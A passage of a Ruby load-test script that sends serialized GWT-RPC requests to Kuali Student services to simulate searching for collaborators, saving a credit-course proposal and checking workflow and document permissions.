7|5|6|7|0|2|18|-15|14|89|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|146|-555|-557|-549|-553|-1|-547|8|147|17|5|6|7|0|0|-1|-563|8|148|17|5|6|7|0|3|8|149|38|39|3488185173|1309965025280|453000000|8|150|90|91|1|0|8|151|14|152|-1|-567|8|21|17|5|6|7|0|3|8|134|17|5|6|7|0|1|8|22|14|153|-581|-583|8|136|17|5|6|7|0|1|8|22|14|137|-581|-589|8|13|17|5|6|7|0|1|8|22|14|154|-581|-595|-1|-579|8|155|17|5|6|7|0|12|8|156|14|157|8|30|14|158|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488185428|1309965025280|708000000|8|40|14|59|8|41|38|39|3488197141|1309965025280|421000000|8|42|14|159|-603|-609|8|44|14|65|8|160|17|5|6|7|0|1|18|-15|14|122|-603|-627|8|161|14|162|8|163|17|5|6|7|0|0|-603|-635|8|164|17|5|6|7|0|0|-603|-639|8|165|14|166|8|46|14|167|8|48|14|168|8|169|14|170|-1|-601|8|171|17|5|6|7|0|1|8|172|17|5|6|7|0|0|-653|-655|-1|-651|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:affliated_orgs_id_name], \"regexp\" => opts[:affliated_orgs_id_regexp]},\n {\"name\" => opts[:lab_fee_id_name], \"regexp\" => opts[:lab_fee_id_regexp]},\n {\"name\" => opts[:revenues_id_name], \"regexp\" => opts[:revenues_id_regexp]},\n {\"name\" => opts[:revenue_id_name], \"regexp\" => opts[:revenue_id_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/affliated_orgs_id_name/%%_#{opts[:affliated_orgs_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/lab_fee_id_name/%%_#{opts[:lab_fee_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/revenues_id_name/%%_#{opts[:revenues_id_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/revenue_id_name/%%_#{opts[:revenue_id_name]}%%\", {}, {'subst' => 
'true'})\n\n    @request.add_thinktime(2)\n\n    @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n      {\n        'method' => 'POST',\n        'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n        'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n      },\n      {\n        'subst' => 'true'\n      }\n    )\n\n    @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n      {\n        'method' => 'POST',\n        'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n        'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|isAuthorizedAddReviewer|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n      },\n      {\n        'subst' => 'true'\n      }\n    )\n\n    @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n      {\n        'method' => 'POST',\n        'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n        'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|isAuthorizedRemoveReviewers|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n      },\n      {\n        'subst' => 'true'\n      }\n    )\n    \n    \n    \n    \n    #\n    # Authors and Collaborators\n    #\n\n    @request.add_thinktime(5)\n\n    if(!opts[:collaborator].nil?)\n      # Collaborator search\n      for i in 1..opts[:collaborator].length\n        itr = i-1\n        @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n          {\n            'method' => 'POST',\n            'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n            'contents' => \"5|0|14|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|person.queryParam.personGivenName|#{opts[:collaborator][0..itr]}|person.queryParam.excludedUserId|psycho1|person.search.personQuickViewByGivenName|person.resultColumn.DisplayName|1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|0|12|13|14|0|0|\"\n          } \n        ) \n      end\n\n      @request.add_thinktime(5)\n\n\n      contents1 = 
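\n      # With a collaborator configured, this save payload carries the collaborator\n      # entries (principalId, the KS-SYS~Edit Document permission, action flag); the\n      # else branch below sends an otherwise-identical save without them.\n      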
\"5|0|190|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|2|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|1|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|3|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final 
Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|7|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|principalId|#{opts[:collaborator]}|permission|KS-SYS~Edit Document|action|F|firstName|lastName|actionRequestStatus|New|author\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489516951|1309965025280|231000000|8|40|14|59|8|41|38|39|3489523415|1309965025280|695000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489523331|1309965025280|611000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325\"\n contents3 = 
\"|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489513388|1309965025280|668000000|8|40|14|59|8|41|38|39|3489523378|1309965025280|658000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489513379|1309965025280|659000000|8|40|14|59|8|41|38|39|3489523370|1309965025280|650000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489508904|1309965025280|184000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|111|-1|-448|8|136|10|-5|8|137|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|138|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|139|8|30|14|140|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489523331|1309965025280|611000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|141|10|-5|8|142|14|143|8|46|14|62|8|144|14|145|8|123|17|5|6|7|0|2|18|-15|14|146|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|147|-535|-537|-529|-533|-1|-527|8|148|14|149|8|48|14|150|8|120|17|5|6|7|0|2|18|-15|14|151|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|152|-555|-557|-549|-553|-1|-547|8|153|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|154|17|5|6|7|0|0|-1|-579|8|155|17|5|6|7|0|3|8|156|38|39|3489508904|1309965025280|184000000|8|157|89|90|1|0|8|158|14|159|-1|-583|8|21|17|5|6|7|0|3|8|142|17|5|6|7|0|1|8|22|14|160|-597|-599|8|144|17|5|6|7|0|1|8|22|14|145|-597|-605|8|13|17|5|6|7|0|1|8|22|14|161|-597|-611|-1|-595|8|162|17|5|6|7|0|12|8|163|14|164|8|30|14|165|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489509135|1309965025280|415000000|8|40|14|59|8|41|38|39|3489524194|1309965025280|474000000|8|42|14|166|-619|-625|8|44|14|65|8|167|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|168|14|169|8|170|17|5|6|7|0|0|-619|-651|8|171|17|5|6|7|0|0|-619|-655|8|172|14|173|8|46|14|174|8|48|14|175|8|176|14|177|-1|-617|8|178|17|5|6|7|0|1|8|179|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|180|14|181|8|182|14|183|8|184|14|185|8|186|14|181|8|187|14|181|8|188|14|189|8|190|10|-5|-673|-675|-669|-671|-1|-667|0|0|\"\n else\n contents1 = 
\"5|0|179|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|2|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|1|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|3|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final 
Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|7|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491266071|1309965025280|351000000|8|40|14|59|8|41|38|39|3491272352|1309965025280|632000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491272235|1309965025280|515000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491262219|1309965025280|499000000|8|40|14|59|8|41|38|39|3491272295|1309965025280|575000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491262210|1309965025280|490000000|8|40|14|59|8|41|38|39|3491272289|1309965025280|569000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428\"\n contents3 = 
\"|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491257291|1309965025280|571000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|111|-1|-448|8|136|10|-5|8|137|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|138|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|139|8|30|14|140|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491272233|1309965025280|513000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|141|10|-5|8|142|14|143|8|46|14|62|8|144|14|145|8|123|17|5|6|7|0|2|18|-15|14|146|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|147|-535|-537|-529|-533|-1|-527|8|148|14|149|8|48|14|150|8|120|17|5|6|7|0|2|18|-15|14|151|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|152|-555|-557|-549|-553|-1|-547|8|153|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|154|17|5|6|7|0|0|-1|-579|8|155|17|5|6|7|0|3|8|156|38|39|3491257291|1309965025280|571000000|8|157|89|90|1|0|8|158|14|159|-1|-583|8|21|17|5|6|7|0|3|8|142|17|5|6|7|0|1|8|22|14|160|-597|-599|8|144|17|5|6|7|0|1|8|22|14|145|-597|-605|8|13|17|5|6|7|0|1|8|22|14|161|-597|-611|-1|-595|8|162|17|5|6|7|0|12|8|163|14|164|8|30|14|165|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491257553|1309965025280|833000000|8|40|14|59|8|41|38|39|3491273130|1309965025280|410000000|8|42|14|166|-619|-625|8|44|14|65|8|167|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|168|14|169|8|170|17|5|6|7|0|0|-619|-651|8|171|17|5|6|7|0|0|-619|-655|8|172|14|173|8|46|14|174|8|48|14|175|8|176|14|177|-1|-617|8|178|17|5|6|7|0|1|8|179|17|5|6|7|0|0|-669|-671|-1|-667|0|0|\"\n end\n\n # Save & Continue\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:action_request_id_name], \"regexp\" => opts[:action_request_id_regexp]}\n ]\n }\n )\n \n #@request.add(\"DEBUG/affliated_orgs_id_name/%%_#{opts[:action_request_id_name]}%%\", {}, {'subst' => 'true'})\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|isAuthorizedUploadDocuments|java.lang.String/2004016611|%%_#{opts[:proposal_dyn_var_name]}%%|referenceType.clu.proposal|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|getRefDocIdsForRef|java.lang.String/2004016611|kuali.org.RefObjectType.ProposalInfo|%%_#{opts[:proposal_dyn_var_name]}%%|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Support Documents\n # Nothing uploaded\n #\n\n @request.add_thinktime(5)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n 
